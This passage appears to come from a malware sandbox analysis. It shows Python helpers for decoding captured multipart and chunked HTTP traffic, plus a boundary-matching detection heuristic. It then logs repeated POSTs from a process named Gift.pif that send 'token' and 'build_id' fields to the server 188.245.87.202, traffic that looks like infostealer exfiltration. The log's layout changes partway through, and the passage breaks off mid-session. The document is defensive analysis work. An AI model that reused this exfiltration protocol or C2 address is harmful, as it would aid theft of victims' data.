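            "filename": filename.group(1).decode() if filename else None,
            "data": data,
        })
    return parts


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: '<hex size> CRLF <data> CRLF ... 0 CRLF CRLF'."""
    out, pos = b"", 0
    while True:
        line_end = raw.index(CRLF, pos)
        size = int(raw[pos:line_end].split(b";")[0], 16)  # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            return out
        out += raw[pos:pos + size]
        pos += size + 2                                   # skip the data and its CRLF


def boundary_matches_capture(boundary: str) -> bool:
    """Shape shared by every boundary in the sessions above: four dashes, then
    exactly 20 letters each in A..K. A hunting heuristic, not a signature."""
    return re.fullmatch(r"----[A-K]{20}", boundary) is not None


def inspect_request(raw: bytes) -> dict:
    """Summarise one captured POST: host, boundary, plain fields, file names."""
    head, _, body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:                   # skip the request line
        key, _, value = line.decode("latin-1").partition(":")
        headers[key.strip().lower()] = value.strip()
    boundary = re.search(r"boundary=(\S+)", headers["content-type"]).group(1)
    parts = parse_multipart(body, boundary)
    return {
        "host": headers.get("host"),
        "boundary": boundary,
        "length_ok": int(headers["content-length"]) == len(body),
        "fields": {p["name"]: p["data"].decode("latin-1") for p in parts if p["filename"] is None},
        "files": [p["filename"] for p in parts if p["filename"] is not None],
        "boundary_pattern": boundary_matches_capture(boundary),
    }
```

Running `inspect_request(build_sample_request(BOUNDARY))` yields the host, the boundary, the two plain fields and the file name; `decode_chunked(hex_dump_to_bytes(RESPONSE_RAW_HEX))` returns `b"ok"`, which is what the flattened "2ok0" in the report stands for (a 2-byte chunk followed by the zero-length terminating chunk). The same `token` and `build_id` values recur in every session on this page, so they are the natural pivot when grouping these sessions in a capture.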


Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:38 UTC | 326 | OUT | POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
  Host: 188.245.87.202
  Content-Length: 6533
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-08-05 16:56:38 UTC | 6533 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74
  Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------IJKKKFCFHCFIECBGDHIDCont
2024-08-05 16:56:39 UTC | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 16:56:38 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-08-05 16:56:39 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 2ok0


Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 49739 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:39 UTC | 326 | OUT | POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
  Host: 188.245.87.202
  Content-Length: 3269
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-08-05 16:56:39 UTC | 3269 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74
  Data Ascii: ------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------DBFBFBGDBKJJKFIEHJDBCont
2024-08-05 16:56:40 UTC | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 16:56:39 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-08-05 16:56:40 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 2ok0


Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 49740 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:40 UTC | 327 | OUT | POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEG
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
  Host: 188.245.87.202
  Content-Length: 11445
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-08-05 16:56:40 UTC | 11445 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74
  Data Ascii: ------BFHIJEBKEBGHIDHJKJEGContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------BFHIJEBKEBGHIDHJKJEGContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------BFHIJEBKEBGHIDHJKJEGCont
2024-08-05 16:56:41 UTC | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 16:56:41 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-08-05 16:56:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 2ok0


Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 49741 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:41 UTC | 327 | OUT | POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEG
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
  Host: 188.245.87.202
  Content-Length: 11449
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-08-05 16:56:41 UTC | 11449 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74
  Data Ascii: ------BFHIJEBKEBGHIDHJKJEGContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------BFHIJEBKEBGHIDHJKJEGContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------BFHIJEBKEBGHIDHJKJEGCont
2024-08-05 16:56:42 UTC | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 16:56:42 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-08-05 16:56:42 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 2ok0


Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 49742 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:42 UTC | 326 | OUT | POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
  Host: 188.245.87.202
  Content-Length: 4277
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-08-05 16:56:42 UTC | 4277 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74
  Data Ascii: ------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------FHDAEHDAKECGCAKFCFIJCont
2024-08-05 16:56:43 UTC | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 16:56:43 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-08-05 16:56:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 2ok0


Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 49743 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:43 UTC | 326 | OUT | POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
  Host: 188.245.87.202
  Content-Length: 4273
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-08-05 16:56:43 UTC | 4273 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74
  Data Ascii: ------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------FHDAEHDAKECGCAKFCFIJCont
2024-08-05 16:56:44 UTC | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 16:56:44 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-08-05 16:56:44 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 2ok0


Session ID: 31 | Source IP: 192.168.2.5 | Source Port: 49744 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:44 UTC | 326 | OUT | POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
  Host: 188.245.87.202
  Content-Length: 4317
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-08-05 16:56:44 UTC | 4317 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74
  Data Ascii: ------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------FHDAEHDAKECGCAKFCFIJCont
2024-08-05 16:56:45 UTC | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 16:56:45 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-08-05 16:56:45 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.549745188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:45 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIII
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 1977
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:45 UTC1977OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------BAEBGHCFCAAFIECAFIIICont
                                                                        2024-08-05 16:56:46 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Timestamp:2024-08-05 16:56:46 UTC
                                                                        Bytes transferred:12
                                                                        Direction:IN
                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID:33
                                                                        Source IP:192.168.2.5
                                                                        Source Port:49746
                                                                        Destination IP:188.245.87.202
                                                                        Destination Port:443
                                                                        PID:748
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp:2024-08-05 16:56:46 UTC
                                                                        Bytes transferred:326
                                                                        Direction:OUT
                                                                        Data:POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIII
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 3161
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        Timestamp:2024-08-05 16:56:46 UTC
                                                                        Bytes transferred:3161
                                                                        Direction:OUT
                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------BAEBGHCFCAAFIECAFIIICont
                                                                        Timestamp:2024-08-05 16:56:47 UTC
                                                                        Bytes transferred:158
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:47 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Timestamp:2024-08-05 16:56:47 UTC
                                                                        Bytes transferred:12
                                                                        Direction:IN
                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID:34
                                                                        Source IP:192.168.2.5
                                                                        Source Port:49747
                                                                        Destination IP:188.245.87.202
                                                                        Destination Port:443
                                                                        PID:748
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp:2024-08-05 16:56:47 UTC
                                                                        Bytes transferred:326
                                                                        Direction:OUT
                                                                        Data:POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHC
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 1697
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        Timestamp:2024-08-05 16:56:47 UTC
                                                                        Bytes transferred:1697
                                                                        Direction:OUT
                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------GDBKJDGIJECFIEBFIDHCCont
                                                                        Timestamp:2024-08-05 16:56:48 UTC
                                                                        Bytes transferred:158
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Timestamp:2024-08-05 16:56:48 UTC
                                                                        Bytes transferred:12
                                                                        Direction:IN
                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID:35
                                                                        Source IP:192.168.2.5
                                                                        Source Port:49748
                                                                        Destination IP:188.245.87.202
                                                                        Destination Port:443
                                                                        PID:748
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp:2024-08-05 16:56:48 UTC
                                                                        Bytes transferred:326
                                                                        Direction:OUT
                                                                        Data:POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKE
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 1929
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        Timestamp:2024-08-05 16:56:48 UTC
                                                                        Bytes transferred:1929
                                                                        Direction:OUT
